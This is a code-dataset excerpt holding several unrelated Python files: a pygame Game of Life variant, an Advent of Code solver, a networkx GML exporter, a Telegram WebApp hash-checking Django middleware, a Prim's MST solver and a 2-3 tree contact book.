board.Cushion and 0 <= b < board.Height + board.Cushion:\n kill = None # if on the board check if anything needs adding to turn\n if not (held_down[\"mouse0\"] or held_down[\"mouse2\"])\\\n and self.Players[player_no - 1].SpareTurns > turns_used[player_no - 1]:\n if pygame.mouse.get_pressed()[0]:\n turn_validation =\\\n self.check_turn_is_valid(board, turn, player_no, a, b, False,\n self.Players[player_no - 1].SpareTurns\n - turns_used[player_no - 1])\n if turn_validation[0]:\n kill = False\n elif pygame.mouse.get_pressed()[2]:\n 
turn_validation =\\\n self.check_turn_is_valid(board, turn, player_no, a, b, True,\n self.Players[player_no - 1].SpareTurns\n - turns_used[player_no - 1])\n if turn_validation[0]:\n kill = True\n if kill is not None: # If the turn was valid\n turn[1].append([a, b, kill])\n turns_used[player_no - 1] += turn_validation[1]\n if pygame.key.get_pressed()[pygame.K_SPACE] and not held_down[\"space\"]:\n turn_chosen = True\n if pygame.key.get_pressed()[pygame.K_f] and not held_down[\"f\"]:\n show_future = not show_future\n show_alive_for = False\n if pygame.key.get_pressed()[pygame.K_j] and not held_down[\"j\"]:\n show_alive_for = not show_alive_for\n show_future = False\n on_button = [False, False] # checks whether the mouse is on either button\n if 2 * self.ButtonBorderSize < screen.get_width()\\\n - x < self.RightColumnSize - 2 * self.ButtonBorderSize:\n if 0 < screen.get_height() - y - self.ButtonBorderSize < self.ButtonHeight:\n if pygame.mouse.get_pressed()[0] and not held_down[\"mouse0\"]:\n turn_chosen = True\n on_button[0] = True\n elif 0 > y - screen.get_height() + 3 * self.ButtonBorderSize\\\n + self.ButtonHeight > -self.ButtonHeight:\n if pygame.mouse.get_pressed()[0] and turn[0] is None:\n turn[0] = len(turn[1])\n on_button[1] = True\n \n self.draw_right_column(screen, self.get_player_scores(board, turns=turn,\n player_no=player_no), on_button,\n turns_used, not turn[0] is None, update=False)\n if show_alive_for:\n board.show_alive(screen, self.TextSize, self.Colour, turn, player_no)\n else:\n board.show_future(screen, turn, player_no, smaller=show_future)\n held_down[\"mouse0\"] = pygame.mouse.get_pressed()[0]\n held_down[\"mouse2\"] = pygame.mouse.get_pressed()[2]\n for key in ((\"space\", \"SPACE\"), (\"f\", \"f\"), (\"j\", \"j\")): # Updates held_down dictionary\n held_down[key[0]] = eval(\"pygame.key.get_pressed()[pygame.K_%s]\" % key[1])\n pygame.display.update()\n fps_limiter.tick(config.FPS)\n return turn\n \n def check_turn_is_valid(self, board, turns, player_no, a, b, kill, turns_left):\n \"\"\"Checks that the turn is valid; returns [bool, int] - bool is whether the move was valid,\n int is how many turns that move should take\"\"\"\n temp_board = copy.deepcopy(board) # Creates a copy of the board to make undoing moves\n temp_board.impose_turns(turns, player_no) # easier - original board isn't changed\n if temp_board.Cell[a][b].CurrentPlayer == player_no:\n return kill, 1\n elif temp_board.Cell[a][b].CurrentState == Dead:\n return not kill, 1\n else:\n if temp_board.Cell[a][b].FullImmune:\n if turns_left >= self.FullImmuneKill:\n return kill, self.FullImmuneKill\n else:\n return False, 1\n elif temp_board.Cell[a][b].PartImmune:\n if turns_left >= self.PartImmuneKill:\n return kill, self.PartImmuneKill\n else:\n return False, 1\n else:\n return kill, 1\n \n def get_player_scores(self, board, turns=None, player_no=0):\n \"\"\"Returns how many cells each player has on the board;\n includes total amount of dead cells (first value)\"\"\"\n player_scores = [0 for _ in range(self.NoOfPlayers + 1)]\n if turns is None:\n for a in range(self.Width):\n for b in range(self.Height):\n player_scores[board.Cell[a][b].CurrentPlayer] += 1\n else:\n temp_board = copy.deepcopy(board)\n temp_board.impose_turns(turns, player_no)\n for a in range(self.Width):\n for b in range(self.Height):\n player_scores[temp_board.Cell[a][b].CurrentPlayer] += 1\n return player_scores\n \n def draw_right_column(self, screen, player_scores, on_button, turns_used, generated,\n clickable=None, update=True):\n 
\"\"\"Draws the column on the right hand side of the screen\"\"\"\n pygame.draw.rect(screen, self.Colour[\"Background\"],\n (screen.get_width() - self.RightColumnSize, 0,\n self.RightColumnSize, screen.get_height()))\n # Erases the last drawing of the column\n write(screen, screen.get_width() - self.RightColumnSize // 2, self.ButtonBorderSize,\n self.PlayerNames[self.CurrentPlayer - 1] + \"'s turn\",\n self.Colour[\"Player\" + str(self.CurrentPlayer)], self.TextSize,\n max_len=self.RightColumnSize, alignment=(\"centre\", \"top\"))\n button_centres = [[screen.get_width() - self.RightColumnSize // 2,\n screen.get_height() - 2 * self.ButtonBorderSize - self.ButtonHeight // 2\n - a * (self.ButtonHeight + 2 * self.ButtonBorderSize)] for a in range(2)]\n for a in range(2): # draws the buttons\n pygame.draw.rect(screen, self.Colour[\"ButtonBorder\"],\n (button_centres[a][0] - self.RightColumnSize // 2\n + self.ButtonBorderSize,\n button_centres[a][1] - self.ButtonHeight // 2 + self.ButtonBorderSize,\n self.RightColumnSize - 2 * self.ButtonBorderSize, self.ButtonHeight))\n pygame.draw.rect(screen, self.Colour[\"Background\"],\n (button_centres[a][0] - self.RightColumnSize // 2\n + 2 * self.ButtonBorderSize,\n button_centres[a][1] - self.ButtonHeight // 2\n + 2 * self.ButtonBorderSize,\n self.RightColumnSize - 4 * self.ButtonBorderSize,\n self.ButtonHeight - self.ButtonBorderSize - 2))\n if clickable is None: # gets the colour of the text in the buttons\n button_colours = [self.Colour[\"Text\"] for _ in range(2)]\n if on_button[0]:\n button_colours[0] = self.Colour[\"Highlighter\"]\n if generated:\n button_colours[1] = self.Colour[\"Unselectable\"]\n else:\n if on_button[1]:\n button_colours[1] = self.Colour[\"Highlighter\"]\n else:\n button_colours = [self.Colour[\"Unselectable\"] for _ in range(2)]\n \n button_text = (\"End Turn\", \"Generate\")\n for a in range(2): # writes in the buttons\n write(screen, button_centres[a][0], button_centres[a][1], button_text[a],\n button_colours[a], self.TextSize, max_len=self.RightColumnSize,\n alignment=(\"centre\", \"centre\"))\n bottom = (screen.get_width() - self.RightColumnSize + self.ButtonBorderSize,\n button_centres[-1][1] - self.ButtonBorderSize - self.ButtonHeight // 2)\n extra_space = 0\n for n in [self.NoOfPlayers - a - 1 for a in range(self.NoOfPlayers)]: # writes in the\n col = self.Players[n].Colour # player information (bottom first)\n extra_space += 4 * self.ButtonBorderSize\n extra_space += write(screen, bottom[0], bottom[1] - extra_space,\n \"Spare Turns: \" + str(self.Players[n].SpareTurns - turns_used[n]),\n col, int(self.TextSize / 1.5),\n alignment=(\"left\", \"bottom\")) + 2 * self.ButtonBorderSize\n extra_space += write(screen, bottom[0], bottom[1] - extra_space,\n \"Cells: \" + str(player_scores[n + 1]), col,\n int(self.TextSize / 1.5),\n alignment=(\"left\", \"bottom\")) + 2 * self.ButtonBorderSize\n extra_space += write(screen, bottom[0], bottom[1] - extra_space, self.PlayerNames[n],\n col, int(self.TextSize / 1.2),\n max_len=self.RightColumnSize - 2 * self.ButtonBorderSize,\n alignment=(\"left\", \"bottom\"))\n if update:\n pygame.display.update()\n \n def check_for_wins(self, board, turns, generations):\n player_scores = self.get_player_scores(board)\n del player_scores[0]\n if self.IsTurnLimit and turns >= self.TurnLimit:\n return \"Turn Limit Reached\", player_scores.index(max(player_scores)) + 1\n if self.IsGenLimit and generations >= self.GenLimit:\n return \"Generation Limit Reached\", player_scores.index(max(player_scores)) 
+ 1\n board_tot = self.Height * self.Width\n for a in range(len(player_scores)):\n if self.BoardAmountWin and player_scores[a] > board_tot * self.BoardAmount:\n return \"Board Amount Passed\", a + 1\n for b in range(len(player_scores)):\n if self.PlayerAmountWin and player_scores[a] * self.PlayerAmount > player_scores[b]:\n return \"Score Difference Passed\", a + 1\n \n\nclass Help:\n def __init__(self):\n self.SectionGapSize = config.H_SectionGapSize\n self.TextSize = config.H_TextSize\n self.TitleSize = config.H_TitleSize\n self.IndentSize = config.H_IndentSize\n self.SliderWidth = config.H_SliderWidth\n self.SliderGapSize = config.H_SliderGapSize\n self.SliderLength = config.H_SliderLength\n self.Width = config.H_Width\n self.Height = 600 # gets changed in the program depending on space taken up by help\n self.ScrollAmount = config.H_ScrollAmount\n self.Colour = config.H_Colour\n self.Surfaces = self.get_surfaces()\n \n def display(self, screen):\n \"\"\"Displays the help page on the given screen\"\"\"\n pygame.display.set_caption(\"Game of Life - Help\")\n pygame.display.set_mode((self.Width, self.Surfaces[0].get_height()))\n screen.fill(self.Colour[\"Background\"])\n self.Height = screen.get_height()\n slider_range = (self.SliderGapSize + self.SliderLength // 2,\n self.Height - self.SliderGapSize - self.SliderLength // 2)\n slider_centre = slider_range[0]\n help_rect = self.Surfaces[0].get_rect() # initialises the help surface to be written\n help_rect.topleft = (self.SectionGapSize, self.SectionGapSize)\n screen.blit(self.Surfaces[0], help_rect) # puts help surface onto the screen\n self.draw(screen, self.Surfaces[1], slider_centre, slider_range)\n slider_last_turn = False\n fps_limiter = pygame.time.Clock()\n while True:\n events = pygame.event.get()\n if check_quit(events):\n break\n x, y = pygame.mouse.get_pos()\n if pygame.mouse.get_pressed()[0]:\n if slider_last_turn:\n y = max(min(y + slider_centre - mouse_start, slider_range[1]), slider_range[0])\n self.draw(screen, self.Surfaces[1], y, slider_range)\n elif -2 * self.SliderGapSize - self.SliderWidth < x - self.Width < 0:\n slider_last_turn = True\n mouse_start = y\n if not slider_centre - self.SliderLength / 2 <\\\n y < slider_centre + self.SliderLength / 2: # if mouse was not clicked\n slider_centre = y # directly on top of the slider\n elif slider_last_turn:\n slider_last_turn = False\n slider_centre += y - mouse_start # reset the position of the slider\n if x > (self.Width - self.SliderWidth - self.SectionGapSize) / 2 - self.SliderGapSize:\n draw = False\n for e in events:\n if e.type == pygame.MOUSEBUTTONDOWN:\n if e.button == 4: # if scrolled down\n slider_centre = max(slider_centre - self.ScrollAmount, slider_range[0])\n draw = True\n if e.button == 5: # if scrolled up\n slider_centre = min(slider_centre + self.ScrollAmount, slider_range[1])\n draw = True\n if draw:\n self.draw(screen, self.Surfaces[1], slider_centre, slider_range)\n pygame.display.update()\n fps_limiter.tick(config.FPS)\n \n def draw(self, screen, help_surface, slider_centre, slider_range):\n \"\"\"Draws the right hand side bit of text & slider at given levels\"\"\"\n pygame.draw.rect(screen, self.Colour[\"Background\"], # draws over changing part of screen\n ((self.Width - self.SliderWidth - self.SectionGapSize)\n // 2 - self.SliderGapSize, 0, self.Width, self.Height))\n pygame.draw.rect(screen, self.Colour[\"Slider\"], # draws slider\n (self.Width - self.SliderGapSize - self.SliderWidth,\n slider_centre - self.SliderLength // 2,\n self.SliderWidth, 
self.SliderLength))\n help_rect = help_surface.get_rect()\n text_range = (self.SectionGapSize, help_surface.get_height()\n - self.Height + 2 * self.SectionGapSize)\n top_y = text_range[0] - (text_range[1] - text_range[0]) * (slider_centre - slider_range[0])\\\n // (slider_range[1] - slider_range[0]) # where the help surface is\n help_rect.topleft = (int((self.Width - self.SliderWidth) // 2) + self.SliderGapSize, top_y)\n screen.blit(help_surface, help_rect)# sets position of help surface in relation to the screen\n pygame.display.update()\n \n def get_surfaces(self):\n \"\"\"Gets the surfaces for the help screen. this needs to only be called once,\n and the surfaces saved to a variable, as it takes a while to run\"\"\"\n text = open(\"help.txt\").read().split(\"++\") # split into the two sections\n for section in range(len(text)):\n text[section] = text[section].split(\"\\n\") # splits into lines\n help_surfaces = []\n \n for section in text:\n extra = 0 # first time is to see how big the surface must be to fit the text,\n for _ in range(2): # the second time it writes it onto a surface of that size\n help_surface = pygame.Surface(((self.Width - self.SliderWidth)\n // 2 - self.SectionGapSize - self.SliderGapSize,\n extra))\n help_surface.fill(self.Colour[\"Background\"])\n extra = 0\n for line in section:\n if line.startswith(\"**\"): # bold text - titles etc.\n size = self.TitleSize\n line = line[2:]\n else:\n size = self.TextSize\n indent = 0\n while line.startswith(\"--\"): # indented text\n indent += 1\n line = line[2:]\n extra += write(help_surface, indent * self.IndentSize, extra, line,\n self.Colour[\"Text\"], size,\n max_len=help_surface.get_width()\n - indent * self.IndentSize) + self.SectionGapSize\n help_surfaces.append(help_surface)\n return help_surfaces\n\n\ndef write(screen, x, y, text, colour, size, max_len=None, gap=0, font=Font, rotate=0,\n alignment=(\"left\", \"top\")):\n \"\"\"Puts text onto the screen at point x,y. 
the alignment variable, if used, can take first value\n \"left\\\", \\\"centre\\\" or \\\"right\\\" and the second value can be \\\"top\\\", \\\"centre\\\" or \\\"bottom\\\".\n Note that these values relate to x and y respectively whatever the rotation, which is in degrees\n Max_len allows you to wrap a line if it becomes too long; the text will be restricted to being\n that many pixels long, and if it gets longer a new line will be started\"\"\"\n font_obj = pygame.font.SysFont(font, size)\n if text == \"\": # if it's a blank line\n line = 1\n extra_space = size\n else:\n line = 0\n extra_space = 0\n while len(text.split()) > 0: # while there is still text that hasn't been written\n line += 1\n msg_surface_obj = pygame.transform.rotate(font_obj.render(text, False, colour), rotate)\n used = len(text.split()) # the amount of text not used so far - uses less until it fits\n while max_len is not None and msg_surface_obj.get_width() > max_len: # within limits, if\n used -= 1 # any, then starts a new line and does it again\n msg_surface_obj = pygame.transform.rotate(font_obj.render(\" \".join(text.split()[:used]),\n False, colour), rotate)\n msg_rect_obj = msg_surface_obj.get_rect()\n a, b = msg_surface_obj.get_size()\n if alignment[0] == \"centre\":\n new_x = x - a // 2\n elif alignment[0] == \"right\":\n new_x = x - a\n else:\n new_x = x\n if alignment[1] == \"centre\":\n new_y = y - b // 2\n elif alignment[1] == \"bottom\":\n new_y = y - b\n else:\n new_y = y\n msg_rect_obj.topleft = (new_x, new_y) # where the two objects will be merged\n screen.blit(msg_surface_obj, msg_rect_obj) # merges them\n y += msg_surface_obj.get_height() + gap\n extra_space += msg_surface_obj.get_height() + gap\n text = \" \".join(text.split()[used:]) # deletes text used - it has been written,\n return extra_space # and is no longer needed\n\n\ndef check_quit(events):\n \"\"\"Checks whether the player tried to quit the game.\n Returns a boolean corresponding to whether the ESC key was pressed.\"\"\"\n for event in events:\n if event.type == pygame.QUIT:\n quit_game()\n if pygame.key.get_pressed()[pygame.K_ESCAPE]:\n return True\n return False\n\n\ndef quit_game():\n \"\"\"Quits the game\"\"\"\n pygame.quit()\n import sys\n sys.exit(0)\n","repo_name":"JosephLGibson/Game-of-Game-of-Life","sub_path":"set_up.py","file_name":"set_up.py","file_ext":"py","file_size_in_byte":40655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"70227367553","text":"import os\n\ndef getTurnValue(turn):\n if turn == 'A' or turn == 'X':\n return 1\n elif turn == 'B' or turn == 'Y':\n return 2\n elif turn == 'C' or turn == 'Z':\n return 3\n else:\n return 0\n\ndef processInputPart1(fileName):\n\n countRounds= 0\n scoresPlayer1 = []\n scoresPlayer2 = []\n\n file = open(fileName, \"r\")\n\n if os.path.getsize(fileName) > 0:\n\n for line in file:\n\n countRounds += 1\n line = line.rstrip()\n (turnPlayer1, turnPlayer2) = line.split(\" \")\n\n roundScorePlayer1 = getTurnValue(turnPlayer1)\n roundScorePlayer2 = getTurnValue(turnPlayer2)\n\n if getTurnValue(turnPlayer1) - getTurnValue(turnPlayer2) == -2:\n roundScorePlayer1 += 6\n elif getTurnValue(turnPlayer1) - getTurnValue(turnPlayer2) == -1:\n roundScorePlayer2 += 6\n elif getTurnValue(turnPlayer1) - getTurnValue(turnPlayer2) == 0:\n roundScorePlayer1 += 3\n roundScorePlayer2 += 3\n elif getTurnValue(turnPlayer1) - getTurnValue(turnPlayer2) == 1:\n roundScorePlayer1 += 6\n elif getTurnValue(turnPlayer1) - getTurnValue(turnPlayer2) == 
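# Aside (illustrative sketch, not part of the set_up.py record above): write()
# wraps text by greedily dropping trailing words until the rendered surface
# fits max_len, then repeating on the remainder. The same algorithm without
# pygame, using character count as a stand-in for pixel width:
def wrap(text, max_chars):
    lines = []
    words = text.split()
    while words:
        used = len(words)
        # Shrink the line until it fits, but always keep at least one word.
        while used > 1 and len(" ".join(words[:used])) > max_chars:
            used -= 1
        lines.append(" ".join(words[:used]))
        words = words[used:]
    return lines

assert wrap("the quick brown fox jumps", 10) == ["the quick", "brown fox", "jumps"]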
2:\n roundScorePlayer2 += 6\n\n scoresPlayer1.append(roundScorePlayer1)\n scoresPlayer2.append(roundScorePlayer2)\n\n scorePlayer1 = sum(scoresPlayer1)\n scorePlayer2 = sum(scoresPlayer2)\n\n print(\"PART 1\")\n print(f\" Score Elf : {scorePlayer1}\")\n print(f\" Score Me : {scorePlayer2}\")\n\ndef processInputPart2(fileName):\n\n matrix = {1: {'X': 3, 'Y': 1, 'Z': 2},\n 2: {'X': 1, 'Y': 2, 'Z': 3},\n 3: {'X': 2, 'Y': 3, 'Z': 1}}\n\n countRounds= 0\n scoresPlayer1 = []\n scoresPlayer2 = []\n\n file = open(fileName, \"r\")\n\n if os.path.getsize(fileName) > 0:\n\n for line in file:\n\n countRounds += 1\n line = line.rstrip()\n (turnPlayer1, turnPlayer2) = line.split(\" \")\n\n roundScorePlayer1 = getTurnValue(turnPlayer1)\n roundScorePlayer2 = matrix[roundScorePlayer1][turnPlayer2]\n\n if roundScorePlayer1 - roundScorePlayer2 == -2:\n roundScorePlayer1 += 6\n elif roundScorePlayer1 - roundScorePlayer2 == -1:\n roundScorePlayer2 += 6\n elif roundScorePlayer1 - roundScorePlayer2 == 0:\n roundScorePlayer1 += 3\n roundScorePlayer2 += 3\n elif roundScorePlayer1 - roundScorePlayer2 == 1:\n roundScorePlayer1 += 6\n elif roundScorePlayer1 - roundScorePlayer2 == 2:\n roundScorePlayer2 += 6\n\n scoresPlayer1.append(roundScorePlayer1)\n scoresPlayer2.append(roundScorePlayer2)\n\n scorePlayer1 = sum(scoresPlayer1)\n scorePlayer2 = sum(scoresPlayer2)\n\n print(\"PART 2\")\n print(f\" Score Elf : {scorePlayer1}\")\n print(f\" Score Me : {scorePlayer2}\")\n\ndef main():\n\n processInputPart1(\"input.txt\")\n processInputPart2(\"input.txt\")\nif __name__ == \"__main__\":\n main()","repo_name":"fschryvers/Advent-of-Code-2022","sub_path":"Day 02/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29820765816","text":"\"\"\"Setup module of the package.\"\"\"\nimport uuid\n\n__author__ = 'Matthieu Gouel '\nfrom setuptools import setup, find_packages\nfrom pip.req import parse_requirements\n\n\nINSTALL_REQS = parse_requirements('requirements.txt', session=uuid.uuid1())\nREQS = [str(ir.req) for ir in INSTALL_REQS]\n\nsetup(\n name=\"api\",\n version=\"0.1.0\",\n packages=find_packages(),\n author=\"Matthieu Gouel\",\n author_email=\"matthieu.gouel@gmail.com\",\n description=\"api for Python3 projects\",\n classifiers=[\n 'Topic :: Utilities',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: MacOS',\n ],\n url=\"\",\n include_package_data=True,\n install_requires=REQS\n)\n","repo_name":"matthieugouel/python-flask-celery-example","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"60"} +{"seq_id":"14377839126","text":"#!/usr/bin/python3\n\n# Takes in an edgelist and corresponding communities, and\n# outputs a gml file to be read by, for example, Gephi\n\n## For example, when I create plots, I read the gml file into\n## Gephi, color by community using the Partition->Nodes tab,\n## layout using ForceAtlas2, and then tweaking parameters\n## and manually dragging nodes around\n\nimport networkx as nx\nimport numpy as np\nimport sys\nfrom random import random\nfrom optparse import OptionParser\n\n# gives gml strings for nodes\ndef node_to_str(name, comm, size, proportional_size=False):\n if proportional_size:\n size = size*.7\n 
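# Aside (illustrative sketch, not part of the day2.py record above): the
# if/elif chain there scores rock-paper-scissors by case analysis on the
# difference of the two turn values. Because the shapes cycle, the same
# outcome can be read off modulo 3; this helper is a hypothetical equivalent,
# not code from the original file:
def round_outcome(p1, p2):
    """p1, p2 in {1, 2, 3} (rock, paper, scissors); returns (bonus1, bonus2)."""
    d = (p2 - p1) % 3
    if d == 0:        # same shape: draw, both score 3
        return 3, 3
    if d == 1:        # p2 plays the shape that beats p1
        return 0, 6
    return 6, 0       # otherwise p1 wins

assert round_outcome(1, 1) == (3, 3)   # rock vs rock: draw
assert round_outcome(1, 2) == (0, 6)   # rock loses to paper
assert round_outcome(1, 3) == (6, 0)   # rock beats scissors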
else:\n size = 20\n\n ret = 'node\\n[\\nid %d\\ncomm %d\\ngraphics\\n[\\nw %f\\n'%(name, comm, size)\n ret += ']\\n]\\n'\n return ret\n\ndef combine(edgelist, comms, out_file, proportional_size):\n G = nx.read_edgelist(edgelist, nodetype = int, data=(('weight',float),))\n\n # get the community for each vertex, taken as the max weight in each line\n comm_list = []\n for l in open(comms):\n split = list(map(float,l.split()))\n comm_list.append((np.argmax(split), max(split)))\n '''\n try:\n print(np.argmax(split), max(split))\n except Exception:\n print(l)\n '''\n\n #output the graph file\n out = open(out_file, 'w+')\n out.write('graph\\n[\\ndirected 0\\n')\n\n # first write nodes and their communities\n for n in G.nodes():\n out.write(node_to_str(n, comm_list[n][0], comm_list[n][1], proportional_size))\n\n # then write the edges\n for e in G.edges(data=True):\n if len(e) == 3 and 'weight' in e[2]:\n out.write('edge\\n[\\nsource %d\\ntarget %d\\nweight %f\\n]\\n'%(e[0],e[1],e[2]['weight']))\n else:\n out.write('edge\\n[\\nsource %d\\ntarget %d\\n\\n]\\n'%(e[0],e[1]))\n\n out.write(']')\n\nif __name__ == '__main__':\n # parse command line options\n parser = OptionParser()\n parser.add_option('-i', type=str, dest = 'edgelist', help='input file edgelist', default='data/protein.edges')\n parser.add_option('-c', type=str, dest = 'comms', help='input communities (output from bp algorithm)', default='out/protein.out')\n parser.add_option('-o', type=str, dest = 'out_file', help='output file, containing vertices and their communities in gml format', default='out/protein.gml')\n parser.add_option('-s', action='store_true', dest='proportional_size', help='flag to make node size proportional to its community membership', default=False)\n\n (options, _) = parser.parse_args()\n\n combine(options.edgelist, options.comms, options.out_file, options.proportional_size)\n","repo_name":"nitramsivart/uncertain-networks","sub_path":"format_output.py","file_name":"format_output.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"} +{"seq_id":"40888450709","text":"from django.conf import settings\nfrom django.http import JsonResponse\nfrom urllib import parse\nimport hashlib\nimport hmac\nfrom .utils import get_telegram_data\n\n\nclass TelegramMiddleware:\n def __init__(self, get_response):\n self.get_response = get_response\n\n self.bot_token = settings.TELEGRAM_TOKEN\n\n\n def __call__(self, request):\n is_valid = False\n telegram_params = get_telegram_data(request)\n telegram_hash = telegram_params.pop('hash')\n\n if telegram_hash:\n telegram_keys = list(telegram_params.keys())\n telegram_keys.sort()\n\n telegram_check_row = \"\\n\".join([\n f'{key}={telegram_params[key]}' for key in telegram_keys\n ])\n secret_key = hmac.new(\"WebAppData\".encode(), self.bot_token.encode(), hashlib.sha256)\n result_hash = hmac.new(secret_key.digest(), telegram_check_row.encode(), hashlib.sha256).hexdigest()\n if result_hash == telegram_hash:\n is_valid = True\n\n\n\n if not is_valid:\n return JsonResponse({'error': 'unvalid hash'}, status=400)\n\n response = self.get_response(request)\n\n\n\n return response","repo_name":"alexanderaleskin/Telegram_web_app","sub_path":"drive_bot_web/web_api/telegram_middleware.py","file_name":"telegram_middleware.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18740015667","text":"import math\n\n# 
Euclidean distance\ndef euclid(x_1, y_1, x_2, y_2):\n return math.sqrt((x_1 - x_2)**2 + (y_1 - y_2)**2)\n\n# Prim's algorithm for total weight of minimum\n# spanning tree (i.e. length)\ndef prim(n, x, y):\n V = [False] * n \n Dist = [float('inf')] * n\n Dist[0] = 0\n\n d_total = 0\n\n for _ in range(n):\n d_min = float('inf')\n i_min = -1\n\n for i in range(n):\n if not V[i] and Dist[i] < d_min:\n d_min = Dist[i]\n i_min = i\n\n V[i_min] = True\n d_total += d_min\n\n for i in range(n):\n if not V[i]:\n d = euclid(x[i_min], y[i_min], x[i], y[i])\n Dist[i] = min(Dist[i], d)\n\n return d_total \n\nif __name__ == \"__main__\":\n num_cases = int(input())\n\n for i in range(num_cases):\n input()\n n = int(input())\n x = []; y = []\n\n for j in range(n):\n xj, yj = map(float, input().split())\n x.append(xj); y.append(yj)\n \n print(\"{:.2f}\".format(prim(n, x, y)))\n if i < num_cases - 1:\n print()\n","repo_name":"lvthnn/TOL607G","sub_path":"Vika9/freckles/freckles.py","file_name":"freckles.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15941605901","text":"from ClaseContacto import *\nfrom faker import Faker\nfrom time import time\nclass Node:\n def __init__(self, value):\n self.data = [value]\n self.parent = None\n self.child = []\n\n def __str__(self):\n if self.parent:\n return str(self.parent.data) + \" : \" + str(self.data)\n return \"Root: \" + str(self.data)\n\n def _is_leaf(self):\n return len(self.child) == 0\n\n def _add(self, new_node):\n for child in new_node.child:\n child.parent = self\n self.data.extend(new_node.data)\n for x in range(0, len(self.data)):\n for j in range(x+1, len(self.data)):\n if self.data[j].apellido > self.data[x].apellido:\n self.data[j], self.data[x] = self.data[x], self.data[j]\n self.child.extend(new_node.child)\n if len(self.child) > 1:\n for x in range(0, len(self.child)):\n for i in range(0, len(self.child[x].data)):\n for j in range(x+1, len(self.child[x].data)):\n if self.child[x].data[j].apellido > self.child[x].data[i].apellido:\n self.child[x].data[j], self.child[x].data[i] = self.child[x].data[i], self.child[x].data[j]\n \n if len(self.data) > 2:\n self._split()\n\n # Encuentra el nodo correcto donde insertar el nuevo nodo\n def _insert(self, new_node):\n\n # Si es hoja, añade el dato a la hoja y hace un balanceo\n if self._is_leaf():\n self._add(new_node)\n\n # Si no es hoja, debe encontrar el hijo correcto para descender y hace una inserción recursiva\n elif new_node.data[0].apellido > self.data[-1].apellido:\n self.child[-1]._insert(new_node)\n else:\n for i in range(0, len(self.data)):\n if new_node.data[0].apellido < self.data[i].apellido:\n self.child[i]._insert(new_node)\n break\n\n # Cuando hay 3 items en el nodo, se divide en un nuevo sub-arbol y se añade al padre\n def _split(self):\n left_child = Node(self.data[0])\n right_child = Node(self.data[2])\n if self.child:\n \tself.child[0].parent = left_child\n \tself.child[1].parent = left_child\n \tself.child[2].parent = right_child\n \tself.child[3].parent = right_child\n \tleft_child.child = [self.child[0], self.child[1]]\n \tright_child.child = [self.child[2], self.child[3]]\n\n self.child = [left_child]\n self.child.append(right_child)\n self.data = [self.data[1]]\n\n # Ahora tenemos un nuevo sub-arbol, y necesitamos añadirlo a su nodo padre\n if self.parent:\n \tif self in self.parent.child:\n \t\tself.parent.child.remove(self)\n \tself.parent._add(self)\n else:\n 
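# Aside (illustrative sketch, not part of the freckles.py record above): that
# file uses the O(n^2) array-based form of Prim's algorithm, a good fit for
# complete geometric graphs where every pair of points is implicitly joined
# by its Euclidean distance. The same idea, self-contained, on three points:
import math

def mst_length(pts):
    n = len(pts)
    in_tree = [False] * n
    dist = [float('inf')] * n  # cheapest known edge from the tree to each point
    dist[0] = 0.0
    total = 0.0
    for _ in range(n):
        # Pick the cheapest point not yet in the tree.
        u = min((i for i in range(n) if not in_tree[i]), key=lambda i: dist[i])
        in_tree[u] = True
        total += dist[u]
        for v in range(n):
            if not in_tree[v]:
                dist[v] = min(dist[v], math.dist(pts[u], pts[v]))
    return total

# Right triangle with legs 3 and 4: the MST uses the two legs, not the hypotenuse.
assert abs(mst_length([(0, 0), (3, 0), (0, 4)]) - 7.0) < 1e-9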
\tleft_child.parent = self\n \tright_child.parent = self\n\t# Busca un item en el arbol y lo retorna siesque lo encuentra, en caso contrario retorna False\n\n def _find(self, apellido):\n \tfor i in self.data:\n if apellido in i.apellido:\n print(\"El contacto fue encontrado en la estructura\")\n return apellido\n \tif self._is_leaf():\n print(\"No se encontro el contacto\")\n \n return False\n \telif apellido > self.data[-1].apellido:\n \t\treturn self.child[-1]._find(apellido)\n \telse:\n \t\tfor i in range(len(self.data)):\n \t\t\tif apellido < self.data[i].apellido:\n \t\t\t\treturn self.child[i]._find(apellido)\n\n def _remove(self, apellido):\n \tpass\n\n\t# Imprime en pre-order\n def _preorder(self):\n \tfor i in self.data:\n print(i.Imprimir())\n \tfor child in self.child:\n child._preorder()\n \n\n\nclass Tree:\n def __init__(self):\n self.root = None\n\n def empty(self):\n return self.root == None\n\n def insert(self, value):\n # Cuando se inserta un valor, siempre se crea un nuevo nodo\n if self.empty():\n self.root = Node(value)\n else:\n self.root._insert(Node(value)) \n while self.root.parent:\n self.root = self.root.parent\n return True\n\n def remove(self, apellido):\n return self.root._remove(apellido)\n\n def find(self, apellido):\n return self.root._find(apellido)\n\n def pre_order(self):\n self.root._preorder()\n\n def agregarContacto(self):\n print(\"Agregar nombre: \")\n nombre = input()\n print(\"Agregar apellido: \")\n apellido = input()\n print(\"Agregar telefono: \")\n telefono = input()\n print(\"Agregar email: \")\n email = input()\n nuevo = Contacto(nombre, apellido, telefono, email)\n return self.insert(nuevo)\n\n def ingresarNContactos(self, n):\n from random import randint\n fake = Faker()\n inicio = time()\n for i in range(0, n):\n x = fake.name()\n y = x.split()\n email = fake.email()\n telefono = str(randint(11111111, 99999999))\n nuevo = Contacto(y[0], y[1], telefono, email)\n self.insert(nuevo)\n termino = time()\n print(termino-inicio)\nif __name__ == \"__main__\":\n fake = Faker()\n lista= Tree() \n lista.ingresarNContactos(1000)\n tiempo2 = time()\n lista.find(fake.name().split()[1])\n 